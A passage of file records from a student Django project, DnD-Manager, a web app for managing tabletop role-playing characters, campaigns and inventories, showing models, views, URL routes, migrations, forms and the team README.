'our help string comes here'\n\n def _create_races(self):\n \n # # Because the models has a built-in defaultRace\n # # that is called before running this script as it is migrating\n # # this race is commented out.\n # human = CharacterRace(\n # raceName='Human',\n # speed=30,\n # size='Medium',\n\n # strengthBonus=1,\n # dexterityBonus=1,\n # constitutionBonus=1,\n # intelligenceBonus=1,\n # wisdomBonus=1,\n # charismaBonus=1\n # )\n # human.save()\n\n dwarf = CharacterRace(\n raceName='Dwarf',\n speed=25,\n size='Small',\n\n strengthBonus=0,\n dexterityBonus=0,\n constitutionBonus=2,\n intelligenceBonus=0,\n wisdomBonus=0,\n charismaBonus=0\n )\n dwarf.save()\n\n\n elf = CharacterRace(\n raceName='Elf',\n speed=30,\n size='Medium',\n\n strengthBonus=0,\n dexterityBonus=2,\n constitutionBonus=0,\n intelligenceBonus=0,\n wisdomBonus=0,\n charismaBonus=0\n )\n elf.save()\n\n gnome = CharacterRace(\n raceName='Gnome',\n speed=30,\n size='Medium',\n\n strengthBonus=0,\n dexterityBonus=0,\n constitutionBonus=0,\n intelligenceBonus=2,\n wisdomBonus=0,\n charismaBonus=0\n )\n gnome.save()\n\n halfling = CharacterRace(\n raceName='Halfling',\n speed=30, #Not sure if this is fully accurate\n size='Medium',\n\n strengthBonus=0,\n dexterityBonus=2,\n constitutionBonus=0,\n intelligenceBonus=0,\n wisdomBonus=0,\n charismaBonus=0\n )\n halfling.save()\n\n halfOrc = CharacterRace(\n raceName='Half-Orc',\n speed=30,\n size='Medium',\n\n strengthBonus=2,\n dexterityBonus=0,\n constitutionBonus=1,\n intelligenceBonus=0,\n wisdomBonus=0,\n charismaBonus=0\n )\n halfOrc.save()\n\n tiefling = CharacterRace(\n raceName='Tiefling',\n speed=30,\n size='Medium',\n\n strengthBonus=0,\n dexterityBonus=0,\n constitutionBonus=0,\n intelligenceBonus=1,\n wisdomBonus=0,\n charismaBonus=2\n )\n tiefling.save()\n\n\n def handle(self, *args, **options):\n self._create_races()" }, { "alpha_fraction": 0.67580646276474, "alphanum_fraction": 0.67580646276474, "avg_line_length": 33.5, "blob_id": "6b9aa12100ad8946937cacc5bd7966a672de5523", "content_id": "edc71f35fff680c1a71a0e0499d6d7c9f0b9920c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 620, "license_type": "no_license", "max_line_length": 84, "num_lines": 18, "path": "/Inventory/urls.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom .views import (\n ItemListView,\n ItemDetailView,\n ItemCreateView,\n ItemEditView,\n ItemDeleteView\n)\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='inventory-home'),\n path('inventory/', ItemListView.as_view(), name='item-list'),\n path('inventory/create/', ItemCreateView.as_view(), name='item-create'),\n path('inventory/<int:pk>/', ItemDetailView.as_view(), name='item-detail'),\n path('inventory/<int:pk>/edit', ItemEditView.as_view(), name='item-edit'),\n path('inventory/<int:pk>/delete', ItemDeleteView.as_view(), name='item-delete'),\n]" }, { "alpha_fraction": 0.5502467155456543, "alphanum_fraction": 0.5692027807235718, "avg_line_length": 43.77906799316406, "blob_id": "200bb1544cb3702f5fb172331da0e7a5d0555ac4", "content_id": "21b7a841b203eda0fe2480a7d031eb9858c3011b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3851, "license_type": "no_license", "max_line_length": 187, "num_lines": 86, "path": "/Character_Builder/migrations/0001_initial.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.7 on 2019-04-08 02:08\n\nimport Character_Builder.models\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AbilityScore',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('abilityName', models.CharField(max_length=255)),\n ],\n ),\n migrations.CreateModel(\n name='AbilityScoreSet',\n fields=[\n ('abilityScoreSetID', models.AutoField(primary_key=True, serialize=False)),\n ('strength', models.IntegerField(default=10)),\n ('dexterity', models.IntegerField(default=10)),\n ('constitution', models.IntegerField(default=10)),\n ('intelligence', models.IntegerField(default=10)),\n ('wisdom', models.IntegerField(default=10)),\n ('charisma', models.IntegerField(default=10)),\n ],\n ),\n migrations.CreateModel(\n name='Character',\n fields=[\n ('characterID', models.AutoField(primary_key=True, serialize=False)),\n ('characterName', models.CharField(max_length=255)),\n ('level', models.IntegerField(default=0)),\n ('xp', models.IntegerField(default=0)),\n ('maxHP', models.IntegerField(default=6)),\n ('currentHP', models.IntegerField(default=6)),\n ('alignment', models.CharField(max_length=255)),\n ('size', models.CharField(max_length=255)),\n ('public', models.BooleanField(default=True)),\n ('strength', models.IntegerField(default=10)),\n ('dexterity', models.IntegerField(default=10)),\n ('constitution', models.IntegerField(default=10)),\n ('intelligence', models.IntegerField(default=10)),\n ('wisdom', models.IntegerField(default=10)),\n ('charisma', models.IntegerField(default=10)),\n ('user', models.ForeignKey(blank=True, default=Character_Builder.models.defaultUser, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='CharacterClass',\n fields=[\n ('characterID', models.AutoField(primary_key=True, serialize=False)),\n ('className', models.CharField(max_length=255)),\n ('hitDice', models.CharField(max_length=255)),\n ],\n ),\n migrations.CreateModel(\n name='CharacterRace',\n fields=[\n ('raceID', models.AutoField(primary_key=True, serialize=False)),\n ('raceName', models.CharField(max_length=255)),\n ('speed', models.IntegerField()),\n ('size', models.CharField(max_length=255)),\n ('strengthBonus', models.IntegerField(default=0)),\n ('dexterityBonus', models.IntegerField(default=0)),\n ('constitutionBonus', models.IntegerField(default=0)),\n ('intelligenceBonus', models.IntegerField(default=0)),\n ('wisdomBonus', models.IntegerField(default=0)),\n ('charismaBonus', models.IntegerField(default=0)),\n ],\n ),\n migrations.AddField(\n model_name='abilityscoreset',\n name='character',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Character_Builder.Character'),\n ),\n ]\n" }, { "alpha_fraction": 0.7591136693954468, "alphanum_fraction": 0.8018227219581604, "avg_line_length": 82.49253845214844, "blob_id": "27914f863f3636e47a19bb0d4092d0b4e17be907", "content_id": "7300e6f2c85be90cadae3b0c230a61327bd4e048", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5602, "license_type": "no_license", "max_line_length": 589, "num_lines": 67, "path": "/README.md", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# DnD-Manager\n\n## Team Members\n* Nicholas Jackson\n* Josh Delgado\n* Jared Spinks\n* Ben Rhiner\n\n## Vision Statement\n*For tabletop game players and game-masters that want to minimize the trivial aspects of playing and automate sharing information between the party. This game manager is a web-based tabletop game manager app that automates sharing information among the party and fosters communication and organization. Unlike D&D beyond that assists in character creation with a lack of focus on player/game-master interaction and 5etools that is a searchable database of just the rules, this game manager is focused on ensuring the party’s custom information is shared among the players and gamemasters.*\n\n*This game manager’s ultimate goal is to reduce trivial recordkeeping by automating communication and organization of the party’s information as a whole. This is achieved through live updates and sharing of information among the party through cloud-based services, in addition to the DM maintaining notes that can be made public or private in an organization customized for their campaign.*\n\n\n# Sprint 1\n* [Product Backlog](https://docs.google.com/spreadsheets/d/1pM4LNKbn0VARa-6aoJjO_WKt7aaFGWfbQ1u1XvpPESQ/edit?usp=sharing)\n* [Sprint Backlog](https://docs.google.com/spreadsheets/d/1kSwNj9AX5eNbuktb5aTGljWqAJVrcWliXfjf6ji_MKM/edit?usp=sharing)\n * [Burndown Chart](https://docs.google.com/document/d/1-_eGpnEMTqlTQZ9PR7Idvgc8gjCuF-HovycDQMN_Dac/edit?usp=sharing)\n* [Requirements](https://docs.google.com/spreadsheets/d/1gTuvJt6pRhQ97uNCz52Mkvo1T-Q63PJ0XSgve65ibP8/edit?usp=sharing)\n* Design Documents\n * [Data Design](https://docs.google.com/document/d/1QYjD3UI0MlG_QJy867MBFY1zpKTJi5I4bI_s6t0syXE/edit)\n * [System Architecture](https://docs.google.com/drawings/d/1TUbR1T9_B6WfCYGCicQKSH8qjjn9X43obXvX7nI2Zt0/edit?usp=sharing)\n * [Class Diagrams](https://drive.google.com/file/d/1Kn8L8AD4Q7S4hYZRatU0C2qe99p2qACq/view?usp=sharing)\n* Source Code\n* [Test Cases](https://docs.google.com/document/d/1jeAmTsOX1DLROMjujJQcMQVDFOtzR25D7ZI6UhZR3LY/edit?usp=sharing)\n* [Product Demonstration](https://youtu.be/6ltb8DO0trQ)\n\n# Sprint 2\n* [Product Backlog](https://docs.google.com/spreadsheets/d/1SPUiozr4JJKxr4k5lzCdrsaK0-ws7KYtYSmHfMbI7UQ/edit?usp=sharing)\n* [Sprint Backlog](https://docs.google.com/spreadsheets/d/1dhpriiFvRYicpAsZGmL1GV5vPbZGGatdtJmQnLFWid0/edit?usp=sharing)\n * [Burndown Chart](https://docs.google.com/document/d/18wBcHFsRhLXcDcpsvCfUhsCGa7oUfoBtNgBy4vTgdsY/edit?usp=sharing)\n* [Requirements](https://docs.google.com/spreadsheets/d/1nBXPtSvDhTsFcAjuocsOde_xebhhVQDXfutLvxPRiQA/edit?usp=sharing)\n* Design Documents\n * [Data Design](https://docs.google.com/document/d/1E3cikrkHcXE-PxppXv7h1ovNXgMTyPIy-kNyr7d9zvQ/edit?usp=sharing)\n * [System Architecture Overview](https://github.com/NickJacksonDev/DnD-Manager/blob/master/Architecture.md)\n * [Architecture Diagram](https://docs.google.com/drawings/d/1MgBqA1_aYosADHNCrgWPZ0p7me8jpzWHd6jJAV7-gSk/edit?usp=sharing)\n * [Architecture Description](https://docs.google.com/document/d/1FA4I41uiwIgKB1tqMOyXJnYcXf9lOJA9ilg85u-RlCQ/edit?usp=sharing)\n * Classes\n * [Class Diagrams](https://drive.google.com/file/d/1NqDpVnVrYHD-SCcfD8B3sug9F6vCOEDB/view?usp=sharing)\n * [Class Descriptions](https://docs.google.com/document/d/1n7qOdXY2i-A0tg3gyodm_GhEKr2NwJpASYI_jcA4ivU/edit?usp=sharing)\n * User Interface\n * [User Interface Diagram](https://drive.google.com/file/d/1WVBX7nz-pJ9zIM4E0k-gchcGm-XRzGoa/view?usp=sharing)\n * [User Story Relations](https://docs.google.com/document/d/1NZeqT6CyVsro24gmO0C-WLZbVaCbVZdCNq2G_n58w24/edit?usp=sharing)\n* Source Code\n* [Test Cases](https://docs.google.com/document/d/1hySpFXEcgq7yQpKu9dCfXvBHdXgoCP7uj1-dY4Cz4eY/edit?usp=sharing)\n* [Product Demonstration](https://youtu.be/k7sRfb0jwsg)\n\n# Sprint 3\n* [Product Backlog](https://docs.google.com/spreadsheets/d/1yalU93YStqyqwz3ZUBy1EZtLaKhgMID6f6fufWoZ8KE/edit?usp=sharing)\n* [Sprint Backlog](https://docs.google.com/spreadsheets/d/1fUKUxqtg4JkbHNHFF-oZBy5y-RowhtRdM0Aj0t6JSWU/edit?usp=sharing)\n * [Burndown Chart](https://docs.google.com/document/d/14EaDMDu6UjNrwlDF0L1FxrIARe3oWlqZVHWuSyc8J7Y/edit?usp=sharing)\n* [Requirements](https://docs.google.com/spreadsheets/d/1N1CPy_iaRu0dj6hx-nkWUPKK_pFIlQ1c-Mawc0ftHAs/edit?usp=sharing)\n* [Design Documents (Combined Document)](https://docs.google.com/document/d/1s8nar8XPxwj1na15H7PedzE4kgNBds71AkfJFWZuHKA/edit?usp=sharing)\n * Individual Links (If Opening Separate Windows is Preferred)\n * [Data Design](https://docs.google.com/document/d/1luUCUrMzw5AgNp7mY7Sc9mi2SCJleE6BTxNjuhC9a_s/edit?usp=sharing)\n * System Architecture Overview\n * [Architecture Diagram](https://docs.google.com/drawings/d/1QB8_oTkLlWlGW-ZIlmnDqP8lbqBihxm7guUMsRQxpFs/edit?usp=sharing)\n * [Architecture Description](https://docs.google.com/document/d/1PfuGnhexS1KiL8sTXMu0RO_MVArG7sSLIJT3LDr3kNE/edit?usp=sharing)\n * Classes\n * [Class Diagrams](https://drive.google.com/file/d/1-mnnTIaG9umsVRBlkadUle6McMipODDV/view?usp=sharing)\n * [Class Descriptions](https://docs.google.com/document/d/1Sz1qP_hNL0tkByMlr58MUXH_xwITuTcloRjZduedv9E/edit?usp=sharing)\n * User Interface\n * [User Interface Diagram](https://drive.google.com/file/d/14GJEFWQ_2_uggGBrMssqrSDOC16sWf8y/view?usp=sharing)\n * [User Story Relations](https://docs.google.com/document/d/1gBH1nNC6jHg3AjiZ9-_l93y2HP8Zjsq4H2v9jQA58WE/edit?usp=sharing)\n* Source Code\n* [Test Cases](https://docs.google.com/document/d/1hpWtMmyitNWu-DH_e-ypOIHVHwBIGMqULYviUlygRm8/edit?usp=sharing)\n* [Product Demonstration](https://youtu.be/CoPPveRnor8)\n\n\n" }, { "alpha_fraction": 0.5574572086334229, "alphanum_fraction": 0.6039119958877563, "avg_line_length": 21.72222137451172, "blob_id": "779ed55d1125bfd96ce981d22c3e62f91088af26", "content_id": "7b41b41d4a55be3b87d2ff266e05c164ec7e16b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 409, "license_type": "no_license", "max_line_length": 75, "num_lines": 18, "path": "/Campaign_Manager/migrations/0002_auto_20190408_1028.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.5 on 2019-04-08 14:28\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Campaign_Manager', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='party',\n name='members',\n field=models.ManyToManyField(to='Character_Builder.Character'),\n ),\n ]\n" }, { "alpha_fraction": 0.6841349601745605, "alphanum_fraction": 0.6841349601745605, "avg_line_length": 29.955554962158203, "blob_id": "2e897c9dcf222c695b3957a269da81def2379ca1", "content_id": "1b7f67b37943531cf2b29e42d000146d1f639bc2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1393, "license_type": "no_license", "max_line_length": 110, "num_lines": 45, "path": "/Campaign_Manager/urls.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.urls import path, reverse, re_path\nfrom django.utils.text import slugify\nfrom .views import (\n CampaignListView,\n CampaignDetailView,\n CampaignCommentCreateView,\n CampaignCommentDetailView,\n CampaignCommentEditView,\n CampaignCommentDeleteView,\n)\nfrom django.urls import path\nfrom . import views\nfrom django.conf.urls import url\n\n\nurlpatterns = [\n path('',\n \tviews.home, name='campaign_builder-home'),\n\n path('campaigns/',\n \tCampaignListView.as_view(), name='campaign-list'),\n\n path('campaigns/<int:pk>/',\n views.overview, name = 'overview_with_pk'),\n\n path('campaigns/<int:pk>/AddComment/',\n \tCampaignCommentCreateView.as_view(), name='campaign-comment'),\n\n path('campaigns/<int:fk>/<slug:slug>/',\n \tCampaignCommentDetailView.as_view(), name='campaigncomment-detail'),\n\n path('campaigns/<int:fk>/<slug:slug>/edit',\n \tCampaignCommentEditView.as_view(), name='campaigncomment-edit'),\n\n path('campaigns/<int:fk>/<slug:slug>/delete',\n \tCampaignCommentDeleteView.as_view(), name='campaigncomment-delete'),\n\n re_path(r'^connect/(?P<operation>.+)/(?P<pk>\\d+)/(?P<id>\\d+)/$', views.update_party, name='update_party'),\n\n path('campaigns/<int:pk>/delete',\n views.confirmDeletion, name = 'confirm-delete'),\n\n path('campaigns/<int:pk>/delete/confirmed',\n views.deleteCampaign, name = 'campaign-delete'),\n]\n" }, { "alpha_fraction": 0.7054759860038757, "alphanum_fraction": 0.7069924473762512, "avg_line_length": 25.026315689086914, "blob_id": "dcb9945b4bd1ef8bf64008479540bed1f2a18021", "content_id": "c862cdb02b5b7026ad33af6a49c803ead09e13dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5935, "license_type": "no_license", "max_line_length": 88, "num_lines": 228, "path": "/Character_Builder/views.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.views.generic import (\n\tListView, \n\tDetailView,\n\tCreateView,\n\tUpdateView,\n\tDeleteView\n)\n\nfrom django.http import HttpResponseRedirect\nfrom .models import (\n\tCharacter, \n\tAbilityScoreSet,\n\tCharacterRace,\n\tCharacterClass\n)\nfrom .forms import (\n\tCreateCharacterForm, \n\t#EditCharacterForm, \n\tEditAbilityScoresForm \n)\n\ndef home(request):\n\tform = CreateCharacterForm(request.POST or None)\n\n\tif form.is_valid():\n\t\tform.save()\n\n\tcontext = {\n\t\t\t'title': 'Home',\n\t\t\t'form': form,\n\t\t\t'characters' : Character.objects.all(),\n\n\t}\n\n\treturn render(request, 'Character_Builder/character_builder-home.html', context)\n\t\n# This is a class based view that uses django's built-in\n# ListView view to display the characters\n# It inherits from ListView\nclass CharacterListView(ListView): \n\tmodel = Character\n\t# template_name = 'CharacterBuilder/Character_builder-home.html'\n\tcontext_object_name = 'characters'\n\n\nclass CharacterDetailView(DetailView):\n\tmodel = Character\n\t# context_object_name = 'characters'\n\n\tdef get_context_data(self, **kwargs):\n\t\t# Call the base implementation first to get a context\n\t\tcontext = super().get_context_data(**kwargs)\n\t\t# Add in the AbilityScore so it can print that as well\n\t\t# context['abilityScores'] = AbilityScoreSet.objects.get_object(character = character)\n\t\t\n\t\treturn context\n\n\nclass CharacterCreateView(LoginRequiredMixin, CreateView):\n\tmodel = Character\n\n\t# Make sure this is updated once you change the form!\n\tfields = [\n\t\t'public',\n\t\t'characterName', \n\t\t'race',\n\t\t'characterClass',\n\t\t'level', \n\t\t'xp', \n\t\t'maxHP', \n\t\t'currentHP', \n\t\t'alignment', \n\t\t'size',\n\n\t\t'strength',\n\t\t'dexterity',\n\t\t'constitution',\n\t\t'intelligence',\n\t\t'wisdom',\n\t\t'charisma'\n\t]\n\t# exclude = []\n\n\t# Added for LoginRequiredMixin\n\tlogin_url = '/login/'\n\n\t# def __init__(self, *args, **kwargs):\n\t# \tform.instance.user = self.request.user\n\n\t# This gets the context which it passes to the html.\n\t# The form1 that the html accesses is defined here.\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(CharacterCreateView, self).get_context_data(**kwargs)\n\t\t\n\t\t# Actually, django has a built in form using the fields above...\n\t\t# So I'm just going to use that built in form.\n\t\tform = CreateCharacterForm(self.request.POST or None)\n\t\tcontext['unusedform'] = form\n\n\t\t# form2 = EditAbilityScoresForm(self.request.POST or None)\n\t\t# context['form2'] = form2\n\t\treturn context\n\n\n\t# def get_context_data(self, **kwargs):\n # context = super(CampaignCommentCreateView, self).get_context_data(**kwargs)\n # campaign=Campaign.objects.get(pk=self.kwargs.get('pk'))\n # dms = CampaignDM.objects.filter(campaign=campaign)\n # context['userIsDM'] = False\n # for dm in dms:\n # if dm.user == self.request.user:\n # context['userIsDM'] = True\n\n # return context\n\n\n\tdef form_valid(self, form):\n\t\t# Updates the author of the current form to be the current user\n\t\tform.instance.user = self.request.user \n\t\t# context['form2'].instance.character = form.instance\n\t\t\n\t\treturn super().form_valid(form)\n\t\n\n\t# TODO: Lookup how to manage this. Perhaps render a different context\n\t# Or a \"Sorry, not able to login\" screen\n\tdef form_invalid(self, **kwargs):\n\t\treturn self.render_to_response(self.get_context_data(**kwargs))\n\n\n\nclass CharacterEditView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n\tmodel = Character\n\tfields = [\n\t\t'public',\n\t\t'characterName', \n\t\t'race',\n\t\t'characterClass',\n\t\t'level', \n\t\t'xp', \n\t\t'maxHP', \n\t\t'currentHP', \n\t\t'alignment', \n\t\t'size',\n\n\t\t'strength',\n\t\t'dexterity',\n\t\t'constitution',\n\t\t'intelligence',\n\t\t'wisdom',\n\t\t'charisma'\n\t]\n\t# exclude = []\n\n\tlogin_url = '/login/'\n\t\n\tdef form_valid(self, form):\n\t\tform.instance.author = self.request.user\n\t\treturn super().form_valid(form)\n\t\n\t# Tests to ensure the logged-in user is the owner of that character...\n\tdef test_func(self):\n\t\tCharacter = self.get_object()\n\t\tif self.request.user == Character.user:\n\t\t\treturn True\n\t\treturn False\n\t\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(CharacterEditView, self).get_context_data(**kwargs)\n\n\t\t# This grabs the self's request's information that is passed into\n\t\t# the edit view data.\n\t\t# For some reason, it does not properly fill in the information\n\t\t# So I'm currently not using this, instead the character_form.html\n\t\t# uses the 'form' that is built into it.\n\t\tform = CreateCharacterForm(self.request.POST or None)\n\t\tcontext['unusedForm1'] = form\n\n\t\t# form2 = EditAbilityScoresForm(self.request.POST or None)\n\t\t# context['form2'] = form2\n\t\treturn context\n\n\t# TODO: Lookup how to manage this. Perhaps render a different context\n\t# Or a \"Sorry, not able to login\" screen\n\tdef form_invalid(self, **kwargs):\n\t\treturn self.render_to_response(self.get_context_data(**kwargs))\n\n\nclass CharacterDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n\tmodel = Character\n\tsuccess_url = '/'\n\tlogin_url = '/login/'\n\tfail_url = '/login/' #Works?\n\n\tdef test_func(self):\n\t\tCharacter = self.get_object()\n\t\tif self.request.user == Character.user:\n\t\t\treturn True\n\t\treturn False\n\ndef home_page(request):\n\n context = {\n 'title' : 'Welcome to DnD Manager!',\n }\n\n return render(request, 'Character_Builder/home.html', context)\n\n\n# This is a class based view that uses django's built-in\n# ListView view to display the races\n# It inherits from ListView\nclass CharacterRaceListView(ListView): \n\tmodel = CharacterRace\n\t# template_name = 'CharacterBuilder/Character_builder-home.html'\n\tcontext_object_name = 'races'\n\n# This is a class based view that uses django's built-in\n# ListView view to display the classes\n# It inherits from ListView\nclass CharacterClassListView(ListView): \n\tmodel = CharacterClass\n\t# template_name = 'CharacterBuilder/Character_builder-home.html'\n\tcontext_object_name = 'classes'\n\n" }, { "alpha_fraction": 0.6738064289093018, "alphanum_fraction": 0.6815484166145325, "avg_line_length": 31.8389835357666, "blob_id": "8ad6cce68722e464b80a9e2fb7a6701906758101", "content_id": "1c410fda5f7fb0c9f5a2e6ae3fd8b39013b9c4a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3875, "license_type": "no_license", "max_line_length": 93, "num_lines": 118, "path": "/Campaign_Manager/models.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom Character_Builder.models import Character\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom django.utils.text import slugify\nfrom django.urls import reverse\nfrom PIL import Image\n\n\n# Constants\nMAX_LENGTH_CAMPAIGN_NAME = 255\n\n# finds a default user\ndef defaultUser():\n default = User.objects.first()\n\n if default is None:\n default = User.objects.create_user('defaultUser', password='djangoproject')\n\n return default\n\n# Keeps track of individual campaigns\nclass Campaign(models.Model):\n creator = models.ForeignKey(User, on_delete=models.CASCADE, default=defaultUser)\n campaignID = models.AutoField(primary_key=True)\n campaignName = models.CharField(max_length = MAX_LENGTH_CAMPAIGN_NAME)\n image = models.ImageField(default='default_campaign.jpg', upload_to='campaign_pics')\n #add Description field\n\n def __str__(self):\n return self.campaignName\n\n def save(self, **kwargs):\n super().save()\n\n image = Image.open(self.image.path)\n\n if image.width > 900 or image.height > 600:\n output_size = (900, 600)\n image.thumbnail(output_size)\n image.save(self.image.path)\n\n dm, created = CampaignDM.objects.get_or_create(campaign=self, user=self.creator)\n\n def get_absolute_url(self):\n return reverse('overview_with_pk', kwargs={'pk': self.pk})\n\n\n# Keeps track of DMs\nclass CampaignDM(models.Model):\n campaignDMID = models.AutoField(primary_key=True)\n user = models.ForeignKey(User, on_delete=models.CASCADE, default=defaultUser)\n campaign = models.OneToOneField(Campaign, on_delete=models.CASCADE)\n\n def __str__(self):\n return self.user.username\n\n\n# used to allow parties to store mulitple party members\nclass PartyCharacter(models.Model):\n #party = models.ForeignKey(Party, on_delete=models.CASCADE)\n character = models.ForeignKey(Character, on_delete=models.CASCADE)\n approved = models.BooleanField(default = False, editable = True)\n\n\n\n def __str__(self):\n return self.character.characterName\n\n# Keeps track of parties\nclass Party(models.Model):\n\n #Keeping this in for now in case the new method doesn't work\n partyID = models.AutoField(primary_key=True)\n #campaign = models.OneToOneField(Campaign, on_delete=models.CASCADE)\n campaign = models.ForeignKey(Campaign, related_name='campaign', on_delete=models.CASCADE)\n members = models.ManyToManyField(Character)\n\n @classmethod\n def add_member(cls, campaign, new_member):\n party, created = cls.objects.get_or_create(\n campaign = campaign\n )\n party.members.add(new_member)\n\n @classmethod\n def remove_member(cls, campaign, new_member):\n party, created = cls.objects.get_or_create(\n campaign = campaign\n )\n party.members.remove(new_member)\n\n def __str__(self):\n return self.campaign.campaignName\n\nclass CampaignComment(models.Model):\n title = models.CharField(max_length = 100)\n content = models.TextField()\n author = models.ForeignKey(User, on_delete=models.CASCADE, default=defaultUser)\n date = models.DateTimeField(default=timezone.now)\n campaign = models.ForeignKey(Campaign, on_delete=models.CASCADE)\n image = models.ImageField(null=True, upload_to='comment_pics')\n slug = models.SlugField(default=slugify(\"Default Slug\"))\n\n def save(self, *args, **kwargs):\n self.slug = slugify(self.title + '' + str(self.date))\n super(CampaignComment, self).save(*args, **kwargs)\n\n if self.image != None:\n image = Image.open(self.image.path)\n\n if image.width > 500 or image.height > 500:\n output_size = (500, 500)\n image.thumbnail(output_size)\n image.save(self.image.path)\n\n def __str__(self):\n return self.slug\n" }, { "alpha_fraction": 0.6519173979759216, "alphanum_fraction": 0.6519173979759216, "avg_line_length": 17.86111068725586, "blob_id": "4d632d31338f0ebd6356c9663332aa20f97f5b2c", "content_id": "5ee55df6acd1d4f43f53f0b5e13d369d8beaa29a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 678, "license_type": "no_license", "max_line_length": 69, "num_lines": 36, "path": "/Character_Builder/forms.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django import forms\nfrom .models import Character, AbilityScoreSet, AbilityScore\n\nclass CreateCharacterForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Character\n\t\tfields = [\n\t\t\t'public',\n\t\t\t'characterName', \n\t\t\t'level', \n\t\t\t'xp', \n\t\t\t'maxHP', \n\t\t\t'currentHP', \n\t\t\t'alignment', \n\t\t\t'size',\n\t\t\t'strength',\n\t\t\t'dexterity',\n\t\t\t'constitution',\n\t\t\t'intelligence',\n\t\t\t'wisdom',\n\t\t\t'charisma'\n\t\t]\n\n# Now unused to prevent needing to access another from within a form.\nclass EditAbilityScoresForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = AbilityScoreSet\n\t\tfields = [\n\t\t\t# 'character',\n\t\t\t'strength',\n\t\t\t'dexterity',\n\t\t\t'constitution',\n\t\t\t'intelligence',\n\t\t\t'wisdom',\n\t\t\t'charisma'\n\t\t]" }, { "alpha_fraction": 0.7117202281951904, "alphanum_fraction": 0.7131379842758179, "avg_line_length": 32.60317611694336, "blob_id": "eab3207dc46bc735cb49dab909499aece831638d", "content_id": "160b1e36bfb07a694dd26117becac217038b29ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2116, "license_type": "no_license", "max_line_length": 117, "num_lines": 63, "path": "/Inventory/models.py", "repo_name": "NickJacksonDev/DnD-Manager", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom Character_Builder.models import Character\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\n\n# Constants\nMAX_LENGTH_ITEM_NAME = 255\n\n# Creates a default character\ndef defaultCharacter():\n default = Character.objects.first()\n\n if default is None:\n default = Character.objects.create(characterName='Default Character', alignment='Lawful Good', size='Medium')\n\n return default\n\n# finds a default user\ndef defaultUser():\n default = User.objects.first()\n\n if default is None:\n default = User.objects.create_user('defaultUser', password='djangoproject')\n\n return default\n\n# Keeps track of inventories\nclass Inventory(models.Model):\n inventoryID = models.AutoField(primary_key=True)\n character = models.ForeignKey(Character, on_delete=models.CASCADE, default=defaultCharacter)\n\n def __str__(self):\n return self.character.characterName\n\n# Creates default inventory\ndef defaultInventory():\n default = Inventory.objects.first()\n\n if default is None:\n dc = Character.objects.create(characterName='Default Character', alignment='Lawful Good', size='Medium')\n default = Inventory.objects.create(character=dc)\n return default\n\n# Keeps track of individual items\nclass Item(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, default=defaultUser, null=True, blank=True)\n itemID = models.AutoField(primary_key=True)\n itemName = models.CharField(max_length = MAX_LENGTH_ITEM_NAME)\n inventory = models.ForeignKey(Inventory, on_delete=models.CASCADE, default=defaultInventory)\n public = models.BooleanField(default=True)\n\n # Should associate a user with the character when initialized\n def save_model(self, request, obj, form, change):\n if obj.user == defaultUser:\n # Only set user during the first save.\n obj.user = request.user\n \n # this is where the page goes to after you save\n def get_absolute_url(self):\n return reverse('item-detail', kwargs={'pk': self.pk})\n\n def __str__(self):\n return self.itemName" }, { "alpha_fraction": 0.7511312365531921, "alphanum_fraction": 0.7541478276252747, "avg_line_length": 28.488889694213867, "blob_id": "5bf03181ec46d96c158eec757bded94128df6166", "content_id": "47bb5e260fd7eda85ee88115ccb94bcb784624e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1326, "license_type": "no_license", "max_line_length": 91, "num_lines": 45, "path": "/Character_Builder/tests.py", "repo_name": "NickJacksonDev/DnD-Manager", 